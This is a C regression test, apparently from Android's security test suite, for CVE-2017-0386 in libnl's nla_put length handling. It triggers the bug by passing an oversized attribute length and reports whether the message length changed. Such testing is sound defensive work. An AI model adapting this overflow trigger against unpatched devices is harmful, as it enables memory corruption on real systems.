
/**
 * Copyright (C) 2019 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE

#define LOG_TAG "CVE-2017-0386"

#include <sys/wait.h>
#include <sys/types.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>

#include "../includes/common.h"

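int main(void) {
  /*
   * Regression test for CVE-2017-0386 (libnl nla_put length handling).
   *
   * A first, well-formed attribute is added so the resulting nlmsg_len can be
   * recorded. A second nla_put is then issued with an invalid, oversized
   * length. A fixed libnl rejects that call and leaves nlmsg_len untouched;
   * if nlmsg_len moved, the library accepted the attribute and the test
   * reports EXIT_VULNERABLE.
   *
   * Returns EXIT_SUCCESS when the oversize attribute was rejected,
   * EXIT_VULNERABLE (from common.h) when it was accepted, and EXIT_FAILURE
   * when the test could not be set up (allocation or baseline put failed).
   */
  struct nl_msg *message = NULL;
  struct nlmsghdr *hdr = NULL;
  char *data = NULL;
  uint32_t baseline_len = 0;
  int rc = 0;
  int ret = EXIT_FAILURE;
  int pagesize = getpagesize();
  /* Sizes inherited from the original test; presumably chosen so the first
   * attribute fills the default message buffer -- not verified here. */
  size_t payloadlength = pagesize + 12 - 0x30;
  size_t payload2length = pagesize;

  message = nlmsg_alloc();
  if (message == NULL) {
    ALOGE("Alloc message memory failed");
    goto out;
  }

  ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
  hdr = message->nm_nlh;

  /* First attribute: valid size, establishes the reference nlmsg_len. */
  data = malloc(payloadlength);
  if (data == NULL) {
    ALOGE("Alloc data memory failed");
    goto out;
  }
  memset(data, 0x41, payloadlength);
  if (nla_put(message, 0x4444, payloadlength, data) < 0) {
    /* Without a baseline the later comparison is meaningless. */
    ALOGE("Initial nla_put failed; cannot establish baseline length");
    goto out;
  }
  baseline_len = hdr->nlmsg_len;
  ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", baseline_len);

  free(data);
  data = NULL;

  /* Second attribute: the length argument is deliberately invalid. */
  data = malloc(payload2length);
  if (data == NULL) {
    ALOGE("Alloc data2 memory failed");
    goto out;
  }
  memset(data, 0x33, payload2length);
  ALOGI("\n\n\nPutting down overflow.......\n\n\n");
  /* A patched libnl returns an error here and leaves the message alone. */
  rc = nla_put(message, 0x8888, 0xFFFFF000, data);
  ALOGI("nla_put with oversized length returned %d", rc);

  ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
  ALOGI("message len = 0x%x", hdr->nlmsg_len);

  /*
   * return 113 error code if length is mismatch
   */
  ret = (baseline_len != hdr->nlmsg_len) ? EXIT_VULNERABLE : EXIT_SUCCESS;

out:
  /* Unconditional release: the original guards were inverted (`if(!data)`),
   * so nothing was ever freed. free(NULL) and nlmsg_free(NULL) are no-ops. */
  free(data);
  nlmsg_free(message);
  return ret;
}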